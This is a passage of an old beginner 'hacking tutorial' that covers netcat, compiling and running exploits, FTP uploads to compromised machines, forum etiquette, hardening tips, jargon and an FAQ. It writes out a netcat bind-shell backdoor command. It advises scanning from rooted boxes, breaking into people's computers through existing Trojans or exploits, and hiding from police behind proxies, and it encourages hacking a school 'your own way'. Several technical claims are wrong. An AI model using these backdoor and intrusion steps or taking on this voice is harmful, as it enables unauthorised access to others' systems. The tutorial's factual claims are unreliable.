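# Where you can only edit a .htaccess file (the directory needs
# AllowOverride Options for this to take effect), the same one-liner works:
# Options -Indexes
```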

BASIC NETCAT TUTORIAL:

So what is NetCat? NetCat is a network tool that reads and writes data across network connections; it uses both the TCP and UDP protocols. NetCat was originally coded in 1998 by a guy who called himself Hobbit; it was then ported to Windows by a member of the l0pht hacking group (NetCat was originally written for Unix operating systems). Although NetCat is an old tool, it is still used today by the majority of hackers. NetCat can be used to do a number of things, some of which are:

Port Scanning
Making TCP Connections
Sending and Receiving Data via UDP
Transferring Files

NetCat is similar to Telnet (it's a TCP/IP client) but has lots of extra features that us hackers use all the time. The first thing we are going to learn is how to transfer a file using NetCat. NetCat can be both a client and a server; first we are going to set up the server.

C:\nc.exe -l -p 23 < filename

Put NetCat on your C:\ drive. I will now explain what the above does: -l tells NetCat to listen, -p is an argument that tells NetCat what port to listen on, and 23, as you should have guessed, is the port that NetCat is listening on; < filename gives NetCat a file, and this file will be transferred to the client when the client requests a file. Now for the client side of things:

C:\nc.exe -vv 127.0.0.1 23 > C:\Hello.jpg

This transfers the file that the server has and saves it to the C:\ drive as Hello.jpg; it is important to note that if we did not put > C:\Hello.jpg (the output file) we would get a whole bunch of ASCII characters printed to the screen instead. Sometimes you may want to do this.

Another thing NetCat is capable of doing is port scanning. Although there are port scanners to do this for you, if you have rooted a box that has NetCat on it and you use NetCat to scan a host, the admin might not spot NetCat as readily as he would a port scanner. We can port scan something using NetCat by doing the following:

C:\>nc.exe -vv -z -w2 127.0.0.1 1-100

This would scan 127.0.0.1 from ports 1 to 100; you may find scanning using NetCat is a bit slow. What do the above options do though? -vv stands for Very Verbose, which means that NetCat will print back as much information as it possibly can; -z prevents any data from being sent to the TCP/UDP ports, meaning the scan is faster; and finally -w2 is the wait time (in seconds) for the response.

It is also possible to use NetCat as a backdoor!

C:\nc.exe -L -p 23 -e C:\WINDOWS\system32\cmd.exe

What this basically does is bind the cmd shell to a port; it would now be possible to Telnet to that machine on port 23 and have a shell! Now I'll explain what each little bit of that does. -L tells the machine to listen and keep listening even when the connection is reset. -p tells NetCat what port to listen on. -e is used to execute a program, in this case cmd.exe.

Below I have listed the arguments you can pass to NetCat and what they do:

-d Allows NetCat to detach from the console on Windows NT.

-e Executes a program, if NetCat is compiled with -DGAPING_SECURITY_HOLE.

-i Sets the interval time (the delay between lines sent or ports scanned).

-g Used to construct a loose-source-routed path for your connection. This is modeled after "traceroute".

-G Positions the "hop pointer" within the list.

-l Tells NetCat to listen

-L Tells NetCat to listen even after the Connection is reset.

-n Forces NetCat to accept only numeric IP addresses (no DNS lookups).

-o Used to obtain a hex dump file.

-p Required for outbound connections. The parameter can be numeric or a name as listed in the services file. If -p is not used, netcat will bind to whatever unused port the system gives it, unless the -r option is used.

-r Causes port scanning to be done randomly. Normally it is done highest to lowest.

-s Used to specify the local network source address. Usage: "-s ip-addr" or "-s name".

-t Enables netcat to respond to telnet option negotiation, if netcat is compiled with the -DTELNET parameter. Telnet daemons will get no useful answers, as they would from a telnet program.

-u Tells netcat to use UDP instead of TCP.

-v Controls the level of verbosity.

-w Limits the time spent trying to make connection(s).

-z Prevents sending any data via TCP/UDP to speed up Port Scans.

COMPILING EXPLOITS:

How do you compile an exploit? This is something beginners ask, and it is also asked sometimes by network admins who wish to test their network for security vulnerabilities. Most exploits are coded in C, so to compile an exploit you will need a C compiler and knowledge of C; well, a knowledge of C isn't always needed, but sometimes it is, which I will explain later on.

First of all, it is important to know whether the exploit is coded for Linux or Windows; if you have a Windows operating system obviously you would want an exploit that is coded for Windows. So how can you tell? Well, when you look at C programs (that includes exploits) you should notice the header files. What are these?

Example 1:

#include "winsock2.h"

This means that the header file is meant to be in the same folder as the exploit. Exploits you download off the Internet sometimes have this yet don't include the header file; this is often to try and stop script kiddies from compiling the exploit.

Example 2:

#include "C:\winsock2.h"

This means the winsock2.h file is expected to be found on the C:\ drive.

Example 3:

#include <winsock2.h>

This means the include file is meant to be found among all the other include files the compiler ships with.

Windows programs use include files that come with most Windows C compilers; these files include windows.h and winsock.h. Some Linux files are netinet/in.h and sys/socket.h. A question you might ask when looking at the Linux files is how come they have a slash in them? This indicates that the file, e.g. in.h, is located in the directory netinet.

My compiler gives an error that contains something to do with ws2_32, or it highlights a line containing #pragma comment(lib,"ws2_32"):

The most likely problem is that you have not included the Winsock library file; if you have LCC-W32 you can add it by going to:

Project -> Configuration -> Linker -> Additional files to add

I get errors, even though I have all the include files, errors include "missing prototype" and "missing semicolon"

The missing semicolon problem can easily be fixed: if you're using LCC-W32 you should get an error saying "missing semicolon before:" and it should highlight some line; just look at the line before and add a semicolon. What about missing prototype? If it says something like missing prototype for function: int main(int hello, int world)

Well, if you were to write a prototype for that you would simply do: int main(int hello, int world);

Notice the semicolon on the end.

My compiler mentions some other error:

This is why you need to Learn C my friend, here is a book that you should find of help: http://www.anomalous-security.org/downloads.php?did=35

What do I do after I compile the exploit:

Well, I would hope you would know this, seriously dude, but in case you don't: I at the very least would have expected you to find out what software the system is running and then compiled this exploit specially for it. All you really need to do is find out what port the program is running on; it will probably be a default one, and if not, do a port scan. You will most probably just have to drag the exploit into Command Prompt and then put the IP address, then the port, of the system you're wishing to exploit; if you're unsure, just drag the exploit into Command Prompt by itself and press enter, and it should print out instructions on how to use it.

USING WINDOWS FTP:

Being able to use Windows FTP via command prompt may be important: if you were to take control of a remote system and needed to upload files to it, a good way of downloading files onto it would be by using Windows FTP, so let's play around with it. First let's just browse Microsoft's FTP server. Open command prompt and type: ftp ftp.microsoft.com Now it's time to enter a username; since you do not have a username on Microsoft's FTP (at least I assume you don't) we have to log in anonymously, so type "anonymous" (without quotation marks) for the username. You should get the following response.

So type your email address and press enter, or if you want you can just press enter and you will still be logged on. We are now logged onto Microsoft's FTP server, yay! Now it's time to download a file from the server; we have no idea where any files are, so let's get a list of them by typing "ls".

You may notice that none of the things listed have file extensions; this is because all the things listed are in fact folders and NOT files, so let's go into one by typing: cd MISC We should get the following response: 250 CWD command successful. Now that we are in that folder, we should get a list of files; we can do this by typing "ls". See that file I have boxed in red? Let's download it onto the C:\ drive by typing: get ReadMe1.txt C:\ReadMe1.txt

If you wish to upload something to the server you can do it by typing: put C:\example.txt Of course you will NOT be able to upload anything to the Microsoft FTP, or at least I assume so.

HACKER COMMUNITY:

The chances are you probably have been laughed at for asking stupid questions or saying stupid things on forums, if you don’t talk on a hacking forum I very strongly suggest you do, not only will you learn a lot but you will gain reputation in the community. Some good forums are: http://forum.zone-h.org http://governmentsecuirty.org http://blackcode.com http://hackerlounge.com http://hackerscenter.com http://www.anomalous-security.org/

If you wish to be respected in the community you must act correctly and show that you are not just a stupid script kiddie. Here are some tips:

1. Master the art of speaking English correctly.
2. Don't ask stupid questions, e.g. "How do I hack?"
3. Provide help to other hackers when you can.
4. Don't expect everyone else to do things for you just because you ask them to.
5. Share information with other hackers.
6. Do not flame other hackers unless absolutely necessary; otherwise it will just make you look like a lamer.
7. Review your posts carefully before posting; you don't want to accidentally screw up your post and make yourself look like an idiot (I have done this too many times).
8. Do not make posts that offend other hackers.
9. Make sure to post in the right section of the forum, and don't request Warez; nearly all Internet Security/Hacking forums do not allow the posting of Warez, so do not ask.
10. Do not make Thank You posts; if you're going to thank someone don't just say Thank You, add some extra stuff in, as some moderators get pissed off at "Thank You Posts".
11. Do not request exploits; not only will this piss off the moderators, but on some forums this is not allowed. If you want exploits search Google heavily; you should find what you're looking for.
12. Do not post about potential targets or illegal activities on the forum; not only is this dangerous but it will probably make you look like an idiot, and if you do so, you probably are an idiot.
13. The search button on a forum can be a very powerful tool; the chances are if you want a piece of information it has already been talked about on the forum, so just do a search and read the posts people have made about the subject. It should educate you.
14. Don't write a tutorial about something you don't really know and post it on a forum.
15. Do NOT rip off other people's work and try to pass it off as your own. I would think this would be common sense, but you would be surprised at how many tutorials I have seen that have just been ripped off other people. Do not think you can get away with it, because if there are people like me on that forum we will expose you for the fraud that you are.
16. Do NOT argue with the moderators; if you do not like the moderators simply leave the forum and go to another forum with better moderators. Arguing with the moderators will just end up with everyone on the forum flaming you.
17. Do not just post links to articles and tutorials, because it's possible the server that is hosting the article or whatever may go down, so copy and paste it and post it on the forum as well as providing a link to the original article.
18. If you're going to be talking on multiple forums, it might be a good idea to use a different password for each forum; that way if someone (including the moderators) gets your password for one of the forums, hopefully they will not have your password for every forum. It's possible they could make posts under your username and make you look like an idiot. By default most forums save your password as an MD5 hash, however some have applied a mod to their forum so it's stored as plain text, so if you pissed off the moderator(s) they could have your password to the other forums.
19. If you're doing malicious things with the knowledge you have, which I do not encourage, you might want to use a proxy or proxies when browsing the Internet; all law enforcement have to do is get a moderator on a forum to give them your IP address.
20. Don't attack other people's tutorials; people write tutorials to try and share information with other hackers. Even if their tutorial is quite bad, you should offer information to help them improve their tutorial instead of just flaming them.

BASIC SECURITY:

If you're going to start hacking, it's a good idea to secure your computer so other hackers will have a harder time attacking it. First download ALL of the Windows updates, including SP2 if you can. After downloading all the updates, remember you're still not safe; there are hackers out there that have exploits that are not patched, so it's best to get a firewall. I recommend:

Zone Alarm: http://zonelabs.com
Sygate: http://sygate.com

Out of the two, I would say Zone Alarm is the best, however it gets annoying at times when it won't let certain programs access the Internet; there have even been cases I've heard of where Zone Alarm has blocked Internet access coming from a person's ISP. Try Zone Alarm; if you don't like it, get Sygate. I'm currently using Sygate. After having all the latest updates and a firewall installed, it's now time to take the last step: getting an Anti Virus program, because sometimes hackers can use Trojans or other tools to disable your Internet Security applications like Zone Alarm. I highly recommend Kaspersky Anti Virus; try searching for a trial version then getting a key file for it. If you cannot obtain Kaspersky Anti Virus, get a free one, either AntiVir or AVG.

AntiVir: http://free-av.com
AVG Anti Virus: http://grisoft.com

STAY AWAY FROM SYMANTEC'S PRODUCTS (NORTON). The chances are that even if you have a good Anti-Virus and Firewall, you will still be insecure. The reason for this is probably that at one point or another you will turn your firewall off to play certain games, because sometimes firewalls accidentally filter out certain traffic that is being sent to you while you're playing the game. If you have your firewall off and an attacker has a 0day exploit, to put it simply you're screwed. What you need to do is disable unnecessary Windows services, so the attacker has little to exploit. You can disable Windows services using the following program:

Below is a list of services which the chances are you do not need; some of the services below might already be disabled on your system.

RPC (Remote Procedure Call) - Port 135
NetBIOS - Port 139
Universal Plug and Play - Port 5000
Terminal Services - Port 3389
Network Black Jack - Port 1025
SMB (Server Message Block) - Port 445
Messenger - Port 135
Remote Registry - Port 139
Telnet - Port 23
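The tutorial does not name the program it uses to disable services. The following PowerShell script is an added example (not from the original text) that audits the services and ports listed above on a modern Windows box; it assumes Windows 8 / Server 2012 or later (for Get-NetTCPConnection) and an elevated prompt. The service names (RpcSs, LanmanServer, upnphost, TermService, TlntSvr, Messenger, RemoteRegistry) are the real Windows service names; the port mapping follows the list above.

```powershell
# Added example, not part of the original tutorial. Reports which of the listed
# ports are listening and what state the matching service is in. Pass -Disable to
# also stop and disable the non-core services that are found running.
param([switch]$Disable)

# Core = $true marks services Windows itself depends on (RPC, SMB/NetBIOS).
# Those are filtered at the firewall rather than disabled, so the script never
# touches them. Messenger and Remote Registry ride over RPC/SMB, so no own port.
$watch = @(
    @{ Port = 135;   Label = 'RPC (Remote Procedure Call)'; Service = 'RpcSs';          Core = $true  }
    @{ Port = 139;   Label = 'NetBIOS';                     Service = $null;            Core = $true  }
    @{ Port = 445;   Label = 'SMB (Server Message Block)';  Service = 'LanmanServer';   Core = $true  }
    @{ Port = 5000;  Label = 'Universal Plug and Play';     Service = 'upnphost';       Core = $false }
    @{ Port = 3389;  Label = 'Terminal Services';           Service = 'TermService';    Core = $false }
    @{ Port = 23;    Label = 'Telnet';                      Service = 'TlntSvr';        Core = $false }
    @{ Port = $null; Label = 'Messenger';                   Service = 'Messenger';      Core = $false }
    @{ Port = $null; Label = 'Remote Registry';             Service = 'RemoteRegistry'; Core = $false }
)

# All TCP ports currently in LISTEN state on this machine.
$listening = Get-NetTCPConnection -State Listen -ErrorAction SilentlyContinue |
             Select-Object -ExpandProperty LocalPort -Unique

foreach ($w in $watch) {
    $svc = $null
    if ($w.Service) { $svc = Get-Service -Name $w.Service -ErrorAction SilentlyContinue }
    $isListening = ($null -ne $w.Port) -and ($listening -contains $w.Port)

    # One row per entry; pipe the script into Format-Table for a readable report.
    [pscustomobject]@{
        Label     = $w.Label
        Port      = $w.Port
        Listening = $isListening
        Service   = $w.Service
        State     = if ($svc) { [string]$svc.Status }    else { 'not installed' }
        StartType = if ($svc) { [string]$svc.StartType } else { '-' }
    }

    # Only act on non-core services that are actually running, and only on request.
    if ($Disable -and $svc -and -not $w.Core -and $svc.Status -eq 'Running') {
        Stop-Service -Name $w.Service -Force
        Set-Service  -Name $w.Service -StartupType Disabled
    }
}
```

Run it once without -Disable to see the report, then re-run after any change to confirm the port has stopped listening.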

HACKER JARGON/SLANG:

1337 Speak: Used to be used by 0ldsk00l h4x0rs on BBSes to prevent some of their posts from being edited out.

Box: Box is slang for computer.

Script Kiddie: Someone who doesn’t know much about hacking, they just use scripts/programs that other people code, they have no idea what they really do.

Skiddie: Short for Script Kiddie

Kiddie: Basically the same as Script Kiddie.

Lamer: Someone who is "lame". Lamers often are try-hard script kiddies; all they wanna do is be destructive and they can't even manage to do that. Do you have a friend who can "hack" with Linux? Lamers often make up shit about how good a hacker they are, to try and get themselves respected in the hacker community; of course most of the stuff they say doesn't make sense because they don't even know what they're talking about!

0Day: 0Day means before its official or legitimate release. People in the Warez scene also use this, e.g. 0Day Warez means that it hasn't been legitimately released yet. Website defacers often use the term 0Day exploit.

Defacer: A Defacer is someone who defaces websites. Defacers are often just advanced Script Kiddies, and are seen as Lamers by most REAL hackers. Nearly all defacers come from Brazil a.k.a. Land Of The Script Kiddie. Do not get down to their low level and start defacing; they're just a bunch of script kiddies, and no REAL hackers respect them at all.

DoSer/DDoSer: Someone who regularly carries out Denial of Service attacks against people. Most DDoSers are just lamers, however in Russia it is very common for DDoSers to earn very large sums of money through carrying out Denial of Service attacks.

Root: "I rooted his box, it only took 5 minutes" - yes, I know what you're thinking lol. Root means to gain or have administrator privileges on a machine.

Uber Hacker: An elite hacker in the true sense.

Black Hat/Cracker: These types of hackers are the bad hackers on the Internet, basically they're the type that hack for personal gain or purely to be destructive, most Crackers are just lamers.

White Hat/Ethical Hacker: These hackers are the good guys of the Internet, their purpose is to improve the security of the Internet, if they find a vulnerability they usually disclose it and help people patch against it.

FREQUENTLY ASKED QUESTIONS:

Below are some frequently asked questions that beginners ask quite a lot.

1. Do I need Linux to compile an exploit? No you do not; most exploits are written for Windows.

2. When I try to compile exploits I get errors! The guys that write the exploits purposely put errors in the exploits so Script Kiddies cannot compile them. If you wish to learn how to use and compile exploits you must learn C (most exploits are written in C.)

3. How can I hack hotmail? Can't help you there, do not contact me asking how.

4. When I try to connect to my victim via Trojan, it won’t connect and I have the right IP Address and other information. Your victim has either deleted the Trojan server, put up a Firewall/IDS/Port Blocker or your Trojan server is buggy (often the problem.)

5. At what point will I become a real hacker? That's a hard question to answer, because people define what a hacker is differently. Most people that argue about what a hacker really is are just lamers; avoid getting into these debates because they're just plain stupid.

6. How can I hack my school? If you're asking that question, then I very strongly suggest you do not attempt it; you might get expelled and you will be laughed at by other people at your school. If you want to hack your school, find your own way, that way you have a lot less chance of getting caught because you know what you're doing.

7. How can I hack without using a Trojan?

Well if you wish to "hack" someone without using a Trojan you could try NetBIOS Hacking, or scan their computer with a Port Scanner to see what ports are open; it's possible they may be infected with a Trojan, so search on Google for default Trojan ports, and if they have one open try connecting with the appropriate Trojan. If you can't hack their NetBIOS and they're not infected with a Trojan, try using an exploit to break into their computer.

8. Where can I get some exploits?

http://security.nnov.ru
http://securityfocus.com
http://packetstormsecurity.com

10. My Anti-Virus detects “Some Hacking Tool” as a virus!

Anti-Virus programs often do this to scare you away from using the program you have downloaded; also, adding more "viruses" into their database makes the Anti-Virus firm look good. Be aware though, sometimes people put viruses inside hacking tools. If you ever download something (except if it's a Binder/Dropper) and it's detected as something like W32/AYF.dropper.trojan then don't run the "program", because someone has obviously bound a virus to it.

11. What is Linux?

Linux is an operating system coded in C which was first created by Linus Torvalds in 1991. Linux operating systems are some of the most popular operating systems around these days; you will find quite a lot of web servers running Linux. Linux is an open source operating system. Linux is basically Unix + A GUI.

12. How do I Spoof My IP Address?

This is not as easy as you may have heard. It's not as simple as just opening up a program and letting the program spoof the IP Address for you; to spoof an IP Address you must code a program which carefully crafts each packet so that the source IP Address in the packet header is incorrect.

13. What is Phreaking?

Phreaking is not related to hacking; Phreaking is actually Phone System Hacking. Old school hackers were Phreakers; they had to hack phone systems in order to be able to dial in to foreign bulletin boards for little or no cost.

14. Is Hacking Illegal?

The answer to that question is hell yes! Hacking is one of the most illegal things you can do, and thanks to the Patriot Act in America (thank god I'm not American) if you get caught hacking you could be charged as a "Terrorist" and receive life in prison without parole! I've also heard stories where the American government has brought hackers from other countries over to America in order to charge them, so if you're hacking something American be damn careful! Lovely, the Patriot Act, isn't it?

15. How Can I?

Search Google; you would be amazed at what you might find. If you still can't find the information on Google try http://alltheweb.com and if you're really having problems ask for help on a forum.

16. What programming language should I learn?

If you're seriously thinking about becoming a hacker, I would strongly recommend C or possibly C++. If you're planning on just programming trojans then Visual Basic may be a better option (very easy to program in.)

USEFUL LINKS:

C/C++ Programming:
http://www.anomalous-security.org/downloads.php?did=36
http://www.anomalous-security.org/downloads.php?did=35
http://www.anomalous-security.org/downloads.php?did=38
http://www.cplusplus.com/doc/tutorial/

SQL/Web Application Security:
http://www.securitydocs.com/library/2656
http://www.securitydocs.com/library/2651
http://www.securitydocs.com/library/1937
http://www.securitydocs.com/library/925

Cross Site Scripting/Web Application Security:
http://www.steve.org.uk/Hacks/XSS/
http://ha.ckers.org/xss.html
http://www.contentverification.com/cross-site-scripting/
http://www.how-to-hack.org/faq.html

Anonymity On The Internet:
http://www.i-hacked.com/content/view/54/42/
http://neworder.box.sk/anonymity.php
http://newdata.box.sk/raven/anonymity.txt

Buffer Overflows:
http://www.nwfusion.com/details/746.html
http://www.linuxsecurity.com/content/view/118881/49/
http://www-106.ibm.com/developerworks/linux/library/l-sp4.html

Web Server Security:
http://httpd.apache.org/docs/misc/security_tips.html
http://www.cert.org/security-improvement/modules/m11.html
http://www.w3.org/Security/Faq/www-security-faq.html
http://www.windowsecurity.com/articles/Web-Server-Defacements-Part1.html
http://www.windowsecurity.com/articles/Web-Server-Defacements-Part2.html
http://www.windowsecurity.com/articles/Web-Server-Defacements-Part3.html

Denial of Service Attacks:
http://www.cert.org/tech_tips/denial_of_service.html
http://www.pentics.net/denial-of-service/white-papers/smurf.cgi
http://www.w3.org/Security/Faq/wwwsf6.html
http://www.onlamp.com/pub/a/bsd/2004/06/24/anti_dos.html

GREETZ AND FUCK OFF'S:

Greetz to syst3m of cha0s, htek, tomchu, The Goon Squad, The Media Assassins, HackJoeSite, wicked and Read101. And finally fritz from hax-studios.net, the guy on my MSN list who has never said a word to me; why won't you talk damnit!

Fuck Off to all those "hackers" who call me a lamer.

DISCLAIMER:

BY READING THIS TUTORIAL YOU'RE AGREEING YOU KNOW THE AUTHOR OF THIS TEXT CANNOT AND WILL NOT BE HELD RESPONSIBLE FOR ANY DAMAGES ARISING FROM THE MALICIOUS USE OF THIS INFORMATION. THIS TEXT IS WRITTEN FOR EDUCATIONAL PURPOSES ONLY! YOU ARE AGREEING YOU WILL NOT CARRY OUT ANY OF THE THINGS WRITTEN IN THIS TEXT. THIS TEXT IS PURELY FOR EDUCATIONAL PURPOSES; YOU'RE AGREEING YOU WILL NOT ATTEMPT ANYTHING MENTIONED IN THIS TEXT!